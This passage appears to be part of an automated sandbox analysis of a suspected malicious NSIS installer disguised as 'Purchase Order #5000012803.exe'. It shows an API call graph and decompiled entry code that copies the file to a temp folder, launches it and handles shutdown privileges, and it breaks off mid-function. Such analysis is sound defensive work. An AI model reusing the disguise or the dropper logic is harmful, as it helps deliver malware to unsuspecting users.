4716 4022b6 RegDeleteValueA RegCloseKey 4714->4716 4716->4717 4722 402a53 4718->4722 4727 402a9f 4718->4727 4719 402a79 RegEnumKeyA 4720 402a8b RegCloseKey 4719->4720 4719->4722 4723 405da3 3 API calls 4720->4723 4721 402ab0 RegCloseKey 4721->4727 4722->4719 4722->4720 4722->4721 4724 402a28 3 API calls 4722->4724 4725 402a9b 4723->4725 4724->4722 4726 402acb RegDeleteKeyA 4725->4726 4725->4727 4726->4727 4727->4717 4728 401d1b GetDC GetDeviceCaps 4729 4029cb 18 API calls 4728->4729 4730 401d37 MulDiv 4729->4730 4731 4029cb 18 API calls 4730->4731 4732 401d4c 4731->4732 4733 405aa7 18 API calls 4732->4733 4734 401d85 CreateFontIndirectA 4733->4734 4735 4024aa 4734->4735 4736 401e1b 4737 4029e8 18 API calls 4736->4737 4738 401e21 4737->4738 4739 404e23 25 API calls 4738->4739 4740 401e2b 4739->4740 4741 4052e5 2 API calls 4740->4741 4745 401e31 4741->4745 4742 401e87 CloseHandle 4744 40264e 4742->4744 4743 401e50 WaitForSingleObject 4743->4745 4746 401e5e GetExitCodeProcess 4743->4746 4745->4742 4745->4743 4745->4744 4747 405ddc 2 API calls 4745->4747 4748 401e70 4746->4748 4749 401e79 4746->4749 4747->4743 4751 4059e3 wsprintfA 4748->4751 4749->4742 4751->4749 3433 401721 3434 4029e8 18 API calls 3433->3434 3435 401728 3434->3435 3439 40578b 3435->3439 3437 40172f 3438 40578b 2 API calls 3437->3438 3438->3437 3440 405796 GetTickCount GetTempFileNameA 3439->3440 3441 4057c2 3440->3441 3442 4057c6 3440->3442 3441->3440 3441->3442 3442->3437 4752 4023a1 4753 402af2 19 API calls 4752->4753 4754 4023ab 4753->4754 4755 4029e8 18 API calls 4754->4755 4756 4023b4 4755->4756 4757 4023be RegQueryValueExA 4756->4757 4761 40264e 4756->4761 4758 4023e4 RegCloseKey 4757->4758 4759 4023de 4757->4759 4758->4761 4759->4758 4763 4059e3 wsprintfA 4759->4763 4763->4758 4764 401922 4765 4029e8 18 API calls 4764->4765 4766 401929 lstrlenA 4765->4766 4767 4024aa 4766->4767 3582 403225 #17 SetErrorMode OleInitialize 3652 405da3 GetModuleHandleA 3582->3652 3586 403293 GetCommandLineA 3657 405a85 lstrcpynA 3586->3657 3588 4032a5 GetModuleHandleA 3589 4032bc 3588->3589 3590 4055a3 CharNextA 3589->3590 3591 4032d0 CharNextA 3590->3591 3593 4032dd 3591->3593 3592 403346 3594 403359 GetTempPathA 3592->3594 3593->3592 3593->3593 3599 4055a3 CharNextA 3593->3599 3603 403348 3593->3603 3658 4031f1 3594->3658 3596 40336f 3597 403393 DeleteFileA 3596->3597 3598 403373 GetWindowsDirectoryA lstrcatA 3596->3598 3666 402c5b GetTickCount GetModuleFileNameA 3597->3666 3600 4031f1 11 API calls 3598->3600 3599->3593 3602 40338f 3600->3602 3602->3597 3606 40340d 3602->3606 3751 405a85 lstrcpynA 3603->3751 3604 4033a4 3604->3606 3608 4033fd 3604->3608 3609 4055a3 CharNextA 3604->3609 3768 4035a6 3606->3768 3696 4035e3 3608->3696 3612 4033bb 3609->3612 3621 4033d8 3612->3621 3622 40343c lstrcatA lstrcmpiA 3612->3622 3613 403426 3615 405346 MessageBoxIndirectA 3613->3615 3614 40350b 3616 40358e ExitProcess 3614->3616 3617 405da3 3 API calls 3614->3617 3619 403434 ExitProcess 3615->3619 3620 40351a 3617->3620 3623 405da3 3 API calls 3620->3623 3752 405659 3621->3752 3622->3606 3625 403458 CreateDirectoryA SetCurrentDirectoryA 3622->3625 3626 403523 3623->3626 3628 40347a 3625->3628 3629 40346f 3625->3629 3630 405da3 3 API calls 3626->3630 3776 405a85 lstrcpynA 3628->3776 3775 405a85 lstrcpynA 3629->3775 3633 40352c 3630->3633 3635 40357a ExitWindowsEx 3633->3635 3642 40353a GetCurrentProcess 3633->3642 3635->3616 3637 403587 3635->3637 3636 4033f2 3767 405a85 lstrcpynA 3636->3767 3806 40140b 3637->3806 3639 405aa7 18 API calls 3640 4034aa DeleteFileA 3639->3640 3643 4034b7 CopyFileA 3640->3643 3649 403488 3640->3649 3644 40354a 3642->3644 3643->3649 3644->3635 3645 4034ff 3647 4057d3 38 API calls 3645->3647 3647->3606 3648 405aa7 18 API calls 3648->3649 3649->3639 3649->3645 3649->3648 3651 4034eb CloseHandle 3649->3651 3777 4057d3 3649->3777 3803 4052e5 CreateProcessA 3649->3803 3651->3649 3653 405dca GetProcAddress 3652->3653 3654 405dbf LoadLibraryA 3652->3654 3655 403268 SHGetFileInfoA 3653->3655 3654->3653 3654->3655 3656 405a85 lstrcpynA 3655->3656 3656->3586 3657->3588 3659 405ce3 5 API calls 3658->3659 3660 4031fd 3659->3660 3661 403207 3660->3661 3662 405578 3 API calls 3660->3662 3661->3596 3663 40320f CreateDirectoryA 3662->3663 3664 40578b 2 API calls 3663->3664 3665 403223 3664->3665 3665->3596 3809 40575c GetFileAttributesA CreateFileA 3666->3809 3668 402c9e 3695 402cab 3668->3695 3810 405a85 lstrcpynA 3668->3810 3670 402cc1 3811 4055bf lstrlenA 3670->3811 3674 402cd2 GetFileSize 3675 402dd3 3674->3675 3693 402ce9 3674->3693 3676 402bc5 32 API calls 3675->3676 3677 402dda 3676->3677 3680 402e16 GlobalAlloc 3677->3680 3677->3695 3816 4031da SetFilePointer 3677->3816 3678 4031a8 ReadFile 3678->3693 3679 402e6e 3682 402bc5 32 API calls 3679->3682 3681 402e2d 3680->3681 3686 40578b 2 API calls 3681->3686 3682->3695 3684 402df7 3687 4031a8 ReadFile 3684->3687 3685 402bc5 32 API calls 3685->3693 3688 402e3e CreateFileA 3686->3688 3689 402e02 3687->3689 3690 402e78 3688->3690 3688->3695 3689->3680 3689->3695 3817 4031da SetFilePointer 3690->3817 3692 402e86 3694 402f01 47 API calls 3692->3694 3693->3675 3693->3678 3693->3679 3693->3685 3693->3695 3694->3695 3695->3604 3697 405da3 3 API calls 3696->3697 3698 4035f7 3697->3698 3699 4035fd 3698->3699 3700 40360f 3698->3700 3827 4059e3 wsprintfA 3699->3827 3701 40596c 3 API calls 3700->3701 3702 403630 3701->3702 3704 40364e lstrcatA 3702->3704 3706 40596c 3 API calls 3702->3706 3705 40360d 3704->3705 3818 403897 3705->3818 3706->3704 3709 405659 18 API calls 3710 403676 3709->3710 3711 4036ff 3710->3711 3713 40596c 3 API calls 3710->3713 3712 405659 18 API calls 3711->3712 3714 403705 3712->3714 3715 4036a2 3713->3715 3716 403715 LoadImageA 3714->3716 3717 405aa7 18 API calls 3714->3717 3715->3711 3721 4036be lstrlenA 3715->3721 3725 4055a3 CharNextA 3715->3725 3718 403740 RegisterClassA 3716->3718 3719 4037c9 3716->3719 3717->3716 3722 40377c SystemParametersInfoA CreateWindowExA 3718->3722 3723 4037d3 3718->3723 3720 40140b 2 API calls 3719->3720 3724 4037cf 3720->3724 3726 4036f2 3721->3726 3727 4036cc lstrcmpiA 3721->3727 3722->3719 3723->3606 3724->3723 3732 403897 19 API calls 3724->3732 3730 4036bc 3725->3730 3729 405578 3 API calls 3726->3729 3727->3726 3728 4036dc GetFileAttributesA 3727->3728 3731 4036e8 3728->3731 3733 4036f8 3729->3733 3730->3721 3731->3726 3734 4055bf 2 API calls 3731->3734 3735 4037e0 3732->3735 3828 405a85 lstrcpynA 3733->3828 3734->3726 3737 403864 3735->3737 3738 4037e8 ShowWindow LoadLibraryA 3735->3738 3829 404ef5 OleInitialize 3737->3829 3739 403807 LoadLibraryA 3738->3739 3740 40380e GetClassInfoA 3738->3740 3739->3740 3743 403822 GetClassInfoA RegisterClassA 3740->3743 3744 403838 DialogBoxParamA 3740->3744 3742 40386a 3745 403886 3742->3745 3746 40386e 3742->3746 3743->3744 3747 40140b 2 API calls 3744->3747 3748 40140b 2 API calls 3745->3748 3746->3723 3750 40140b 2 API calls 3746->3750 3749 403860 3747->3749 3748->3723 3749->3723 3750->3723 3751->3594 3844 405a85 lstrcpynA 3752->3844 3754 40566a 3755 40560c 4 API calls 3754->3755 3756 405670 3755->3756 3757 4033e3 3756->3757 3758 405ce3 5 API calls 3756->3758 3757->3606 3766 405a85 lstrcpynA 3757->3766 3764 405680 3758->3764 3759 4056ab lstrlenA 3760 4056b6 3759->3760 3759->3764 3761 405578 3 API calls 3760->3761 3763 4056bb GetFileAttributesA 3761->3763 3762 405d7c 2 API calls 3762->3764 3763->3757 3764->3757 3764->3759 3764->3762 3765 4055bf 2 API calls 3764->3765 3765->3759 3766->3636 3767->3608 3769 4035c1 3768->3769 3770 4035b7 CloseHandle 3768->3770 3771 4035d5 3769->3771 3772 4035cb CloseHandle 3769->3772 3770->3769 3845 4053aa 3771->3845 3772->3771 3775->3628 3776->3649 3778 405da3 3 API calls 3777->3778 3779 4057de 3778->3779 3780 40583b GetShortPathNameA 3779->3780 3783 405930 3779->3783 3888 40575c GetFileAttributesA CreateFileA 3779->3888 3782 405850 3780->3782 3780->3783 3782->3783 3785 405858 wsprintfA 3782->3785 3783->3649 3784 40581f CloseHandle GetShortPathNameA 3784->3783 3786 405833 3784->3786 3787 405aa7 18 API calls 3785->3787 3786->3780 3786->3783 3788 405880 3787->3788 3889 40575c GetFileAttributesA CreateFileA 3788->3889 3790 40588d 3790->3783 3791 40589c GetFileSize GlobalAlloc 3790->3791 3792 405929 CloseHandle 3791->3792 3793 4058ba ReadFile 3791->3793 3792->3783 3793->3792 3794 4058ce 3793->3794 3794->3792 3890 4056d1 lstrlenA 3794->3890 3797 4058e3 3895 405a85 lstrcpynA 3797->3895 3798 40593d 3799 4056d1 4 API calls 3798->3799 3801 4058f1 3799->3801 3802 405904 SetFilePointer WriteFile GlobalFree 3801->3802 3802->3792 3804 405320 3803->3804 3805 405314 CloseHandle 3803->3805 3804->3649 3805->3804 3807 401389 2 API calls 3806->3807 3808 401420 3807->3808 3808->3616 3809->3668 3810->3670 3812 4055cc 3811->3812 3813 4055d1 CharPrevA 3812->3813 3814 402cc7 3812->3814 3813->3812 3813->3814 3815 405a85 lstrcpynA 3814->3815 3815->3674 3816->3684 3817->3692 3819 4038ab 3818->3819 3836 4059e3 wsprintfA 3819->3836 3821 40391c 3822 405aa7 18 API calls 3821->3822 3823 403928 SetWindowTextA 3822->3823 3824 403944 3823->3824 3825 40365e 3823->3825 3824->3825 3826 405aa7 18 API calls 3824->3826 3825->3709 3826->3824 3827->3705 3828->3711 3837 403e83 3829->3837 3831 404f18 3835 404f3f 3831->3835 3840 401389 3831->3840 3832 403e83 SendMessageA 3833 404f51 OleUninitialize 3832->3833 3833->3742 3835->3832 3836->3821 3838 403e9b 3837->3838 3839 403e8c SendMessageA 3837->3839 3838->3831 3839->3838 3842 401390 3840->3842 3841 4013fe 3841->3831 3842->3841 3843 4013cb MulDiv SendMessageA 3842->3843 3843->3842 3844->3754 3846 405659 18 API calls 3845->3846 3847 4053be 3846->3847 3848 4053c7 DeleteFileA 3847->3848 3849 4053de 3847->3849 3850 403416 OleUninitialize 3848->3850 3851 40551d 3849->3851 3886 405a85 lstrcpynA 3849->3886 3850->3613 3850->3614 3851->3850 3856 405d7c 2 API calls 3851->3856 3853 405408 3854 405419 3853->3854 3855 40540c lstrcatA 3853->3855 3858 4055bf 2 API calls 3854->3858 3857 40541f 3855->3857 3859 405538 3856->3859 3860 40542d lstrcatA 3857->3860 3861 405438 lstrlenA FindFirstFileA 3857->3861 3858->3857 3859->3850 3862 405578 3 API calls 3859->3862 3860->3861 3863 405513 3861->3863 3872 40545c 3861->3872 3864 405542 3862->3864 3863->3851 3866 40573d 2 API calls 3864->3866 3865 4055a3 CharNextA 3865->3872 3867 405548 RemoveDirectoryA 3866->3867 3868 405553 3867->3868 3869 40556a 3867->3869 3868->3850 3874 405559 3868->3874 3870 404e23 25 API calls 3869->3870 3870->3850 3871 4054f2 FindNextFileA 3871->3872 3875 40550a FindClose 3871->3875 3872->3865 3872->3871 3879 40573d 2 API calls 3872->3879 3881 4053aa 59 API calls 3872->3881 3883 404e23 25 API calls 3872->3883 3884 404e23 25 API calls 3872->3884 3885 4057d3 38 API calls 3872->3885 3887 405a85 lstrcpynA 3872->3887 3876 404e23 25 API calls 3874->3876 3875->3863 3877 405561 3876->3877 3878 4057d3 38 API calls 3877->3878 3882 405568 3878->3882 3880 4054bf DeleteFileA 3879->3880 3880->3872 3881->3872 3882->3850 3883->3871 3884->3872 3885->3872 3886->3853 3887->3872 3888->3784 3889->3790 3891 405707 lstrlenA 3890->3891 3892 405711 3891->3892 3893 4056e5 lstrcmpiA 3891->3893 3892->3797 3892->3798 3893->3892 3894 4056fe CharNextA 3893->3894 3894->3891 3895->3801 4768 401ca5 4769 4029cb 18 API calls 4768->4769 4770 401cb5 SetWindowLongA 4769->4770 4771 40287d 4770->4771 4772 401a26 4773 4029cb 18 API calls 4772->4773 4774 401a2c 4773->4774 4775 4029cb 18 API calls 4774->4775 4776 4019d6 4775->4776 4777 4045aa 4778 4045d6 4777->4778 4779 4045ba 4777->4779 4781 404609 4778->4781 4782 4045dc SHGetPathFromIDListA 4778->4782 4788 40532a GetDlgItemTextA 4779->4788 4784 4045f3 SendMessageA 4782->4784 4785 4045ec 4782->4785 4783 4045c7 SendMessageA 4783->4778 4784->4781 4786 40140b 2 API calls 4785->4786 4786->4784 4788->4783 4789 402b2d 4790 402b55 4789->4790 4791 402b3c SetTimer 4789->4791 4792 402ba3 4790->4792 4793 402ba9 MulDiv 4790->4793 4791->4790 4794 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4793->4794 4794->4792 4796 401bad 4797 4029cb 18 API calls 4796->4797 4798 401bb4 4797->4798 4799 4029cb 18 API calls 4798->4799 4800 401bbe 4799->4800 4801 401bce 4800->4801 4802 4029e8 18 API calls 4800->4802 4803 401bde 4801->4803 4804 4029e8 18 API calls 4801->4804 4802->4801 4805 401be9 4803->4805 4806 401c2d 4803->4806 4804->4803 4808 4029cb 18 API calls 4805->4808 4807 4029e8 18 API calls 4806->4807 4809 401c32 4807->4809 4810 401bee 4808->4810 4811 4029e8 18 API calls 4809->4811 4812 4029cb 18 API calls 4810->4812 4814 401c3b FindWindowExA 4811->4814 4813 401bf7 4812->4813 4815 401c1d SendMessageA 4813->4815 4816 401bff SendMessageTimeoutA 4813->4816 4817 401c59 4814->4817 4815->4817 4816->4817 4818 40422e 4819 404264 4818->4819 4820 40423e 4818->4820 4822 403e9e 8 API calls 4819->4822 4821 403e37 19 API calls 4820->4821 4823 40424b SetDlgItemTextA 4821->4823 4824 404270 4822->4824 4823->4819 4825 402630 4826 4029e8 18 API calls 4825->4826 4827 402637 FindFirstFileA 4826->4827 4828 40265a 4827->4828 4832 40264a 4827->4832 4830 402661 4828->4830 4833 4059e3 wsprintfA 4828->4833 4834 405a85 lstrcpynA 4830->4834 4833->4830 4834->4832 4842 4024b0 4843 4024b5 4842->4843 4844 4024c6 4842->4844 4845 4029cb 18 API calls 4843->4845 4846 4029e8 18 API calls 4844->4846 4847 4024bc 4845->4847 4848 4024cd lstrlenA 4846->4848 4849 4024ec WriteFile 4847->4849 4850 40264e 4847->4850 4848->4847 4849->4850 3443 4015b3 3444 4029e8 18 API calls 3443->3444 3445 4015ba 3444->3445 3461 40560c CharNextA CharNextA 3445->3461 3447 40160a 3449 40162d 3447->3449 3450 40160f 3447->3450 3448 4055a3 CharNextA 3451 4015d0 CreateDirectoryA 3448->3451 3455 401423 25 API calls 3449->3455 3452 401423 25 API calls 3450->3452 3453 4015e5 GetLastError 3451->3453 3457 4015c2 3451->3457 3454 401616 3452->3454 3456 4015f2 GetFileAttributesA 3453->3456 3453->3457 3467 405a85 lstrcpynA 3454->3467 3460 40215b 3455->3460 3456->3457 3457->3447 3457->3448 3459 401621 SetCurrentDirectoryA 3459->3460 3462 405626 3461->3462 3464 405632 3461->3464 3463 40562d CharNextA 3462->3463 3462->3464 3466 40564f 3463->3466 3465 4055a3 CharNextA 3464->3465 3464->3466 3465->3464 3466->3457 3467->3459 3468 401734 3469 4029e8 18 API calls 3468->3469 3470 40173b 3469->3470 3471 401761 3470->3471 3472 401759 3470->3472 3523 405a85 lstrcpynA 3471->3523 3522 405a85 lstrcpynA 3472->3522 3475 40175f 3479 405ce3 5 API calls 3475->3479 3476 40176c 3524 405578 lstrlenA CharPrevA 3476->3524 3481 40177e 3479->3481 3484 401795 CompareFileTime 3481->3484 3485 401859 3481->3485 3486 401830 3481->3486 3490 405a85 lstrcpynA 3481->3490 3494 405aa7 18 API calls 3481->3494 3506 40575c GetFileAttributesA CreateFileA 3481->3506 3527 405d7c FindFirstFileA 3481->3527 3530 40573d GetFileAttributesA 3481->3530 3533 405346 3481->3533 3484->3481 3487 404e23 25 API calls 3485->3487 3489 404e23 25 API calls 3486->3489 3496 401845 3486->3496 3488 401863 3487->3488 3507 402f01 3488->3507 3489->3496 3490->3481 3493 40188a SetFileTime 3495 40189c FindCloseChangeNotification 3493->3495 3494->3481 3495->3496 3497 4018ad 3495->3497 3498 4018b2 3497->3498 3499 4018c5 3497->3499 3500 405aa7 18 API calls 3498->3500 3501 405aa7 18 API calls 3499->3501 3503 4018ba lstrcatA 3500->3503 3504 4018cd 3501->3504 3503->3504 3505 405346 MessageBoxIndirectA 3504->3505 3505->3496 3506->3481 3508 402f12 SetFilePointer 3507->3508 3509 402f2e 3507->3509 3508->3509 3537 40302c GetTickCount 3509->3537 3512 402f3f ReadFile 3513 402f5f 3512->3513 3518 401876 3512->3518 3514 40302c 42 API calls 3513->3514 3513->3518 3515 402f76 3514->3515 3516 402ff1 ReadFile 3515->3516 3515->3518 3519 402f86 3515->3519 3516->3518 3518->3493 3518->3495 3519->3518 3520 402fa1 ReadFile 3519->3520 3521 402fba WriteFile 3519->3521 3520->3518 3520->3519 3521->3518 3521->3519 3522->3475 3523->3476 3525 405592 lstrcatA 3524->3525 3526 401772 lstrcatA 3524->3526 3525->3526 3526->3475 3528 405d92 FindClose 3527->3528 3529 405d9d 3527->3529 3528->3529 3529->3481 3531 405759 3530->3531 3532 40574c SetFileAttributesA 3530->3532 3531->3481 3532->3531 3534 40535b 3533->3534 3535 4053a7 3534->3535 3536 40536f MessageBoxIndirectA 3534->3536 3535->3481 3536->3535 3538 403196 3537->3538 3539 40305b 3537->3539 3540 402bc5 32 API calls 3538->3540 3550 4031da SetFilePointer 3539->3550 3546 402f37 3540->3546 3542 403066 SetFilePointer 3547 40308b 3542->3547 3546->3512 3546->3518 3547->3546 3548 403120 WriteFile 3547->3548 3549 403177 SetFilePointer 3547->3549 3551 4031a8 ReadFile 3547->3551 3553 405e9d 3547->3553 3560 402bc5 3547->3560 3548->3546 3548->3547 3549->3538 3550->3542 3552 4031c9 3551->3552 3552->3547 3554 405ec2 3553->3554 3555 405eca 3553->3555 3554->3547 3555->3554 3556 405f51 GlobalFree 3555->3556 3557 405f5a GlobalAlloc 3555->3557 3558 405fd1 GlobalAlloc 3555->3558 3559 405fc8 GlobalFree 3555->3559 3556->3557 3557->3554 3557->3555 3558->3554 3558->3555 3559->3558 3561 402bd3 3560->3561 3562 402beb 3560->3562 3563 402be3 3561->3563 3564 402bdc DestroyWindow 3561->3564 3565 402bf3 3562->3565 3566 402bfb GetTickCount 3562->3566 3563->3547 3564->3563 3575 405ddc 3565->3575 3566->3563 3568 402c09 3566->3568 3569 402c3e CreateDialogParamA 3568->3569 3570 402c11 3568->3570 3569->3563 3570->3563 3579 402ba9 3570->3579 3572 402c1f wsprintfA 3573 404e23 25 API calls 3572->3573 3574 402c3c 3573->3574 3574->3563 3576 405df9 PeekMessageA 3575->3576 3577 405e09 3576->3577 3578 405def DispatchMessageA 3576->3578 3577->3563 3578->3576 3580 402bb8 3579->3580 3581 402bba MulDiv 3579->3581 3580->3581 3581->3572 4851 401634 4852 4029e8 18 API calls 4851->4852 4853 40163a 4852->4853 4854 405d7c 2 API calls 4853->4854 4855 401640 4854->4855 4856 401934 4857 4029cb 18 API calls 4856->4857 4858 40193b 4857->4858 4859 4029cb 18 API calls 4858->4859 4860 401945 4859->4860 4861 4029e8 18 API calls 4860->4861 4863 40194e 4861->4863 4862 401961 lstrlenA 4865 40196b 4862->4865 4863->4862 4864 40199c 4863->4864 4865->4864 4869 405a85 lstrcpynA 4865->4869 4867 401985 4867->4864 4868 401992 lstrlenA 4867->4868 4868->4864 4869->4867 4870 4019b5 4871 4029e8 18 API calls 4870->4871 4872 4019bc 4871->4872 4873 4029e8 18 API calls 4872->4873 4874 4019c5 4873->4874 4875 4019cc lstrcmpiA 4874->4875 4876 4019de lstrcmpA 4874->4876 4877 4019d2 4875->4877 4876->4877 4878 4014b7 4879 4014bd 4878->4879 4880 401389 2 API calls 4879->4880 4881 4014c5 4880->4881 4882 4025be 4883 4025c5 4882->4883 4885 40282a 4882->4885 4884 4029cb 18 API calls 4883->4884 4886 4025d0 4884->4886 4887 4025d7 SetFilePointer 4886->4887 4887->4885 4888 4025e7 4887->4888 4890 4059e3 wsprintfA 4888->4890 4890->4885

                      Executed Functions

                      Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 25 403393-4033aa DeleteFileA call 402c5b 16->25 26 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->26 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 34 40333f 20->34 23 403311-403317 21->23 24 403303-40330c 21->24 30 403327-40332e 23->30 31 403319-403322 23->31 24->23 28 40330e 24->28 40 403411-403420 call 4035a6 OleUninitialize 25->40 41 4033ac-4033b2 25->41 26->25 26->40 28->23 30->20 37 403348-403354 call 405a85 30->37 31->30 36 403324 31->36 34->11 36->30 37->16 50 403426-403436 call 405346 ExitProcess 40->50 51 40350b-403511 40->51 43 403401-403408 call 4035e3 41->43 44 4033b4-4033bd call 4055a3 41->44 48 40340d 43->48 52 4033c8-4033ca 44->52 48->40 54 403513-403530 call 405da3 * 3 51->54 55 40358e-403596 51->55 59 4033cc-4033d6 52->59 60 4033bf-4033c5 52->60 80 403532-403534 54->80 81 40357a-403585 ExitWindowsEx 54->81 57 403598 55->57 58 40359c-4035a0 ExitProcess 55->58 57->58 64 4033d8-4033e5 call 405659 59->64 65 40343c-403456 lstrcatA lstrcmpiA 59->65 60->59 63 4033c7 60->63 63->52 64->40 74 4033e7-4033fd call 405a85 * 2 64->74 65->40 68 403458-40346d CreateDirectoryA SetCurrentDirectoryA 65->68 71 40347a-403494 call 405a85 68->71 72 40346f-403475 call 405a85 68->72 83 403499-4034b5 call 405aa7 DeleteFileA 71->83 72->71 74->43 80->81 85 403536-403538 80->85 81->55 84 403587-403589 call 40140b 81->84 92 4034f6-4034fd 83->92 93 4034b7-4034c7 CopyFileA 83->93 84->55 85->81 90 40353a-40354c GetCurrentProcess 85->90 90->81 98 40354e-403570 90->98 92->83 96 4034ff-403506 call 4057d3 92->96 93->92 94 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->94 94->92 107 4034eb-4034f2 CloseHandle 94->107 96->40 98->81 107->92
                      C-Code - Quality: 82%
                      			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", "C:\\Users\\jones\\Desktop");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
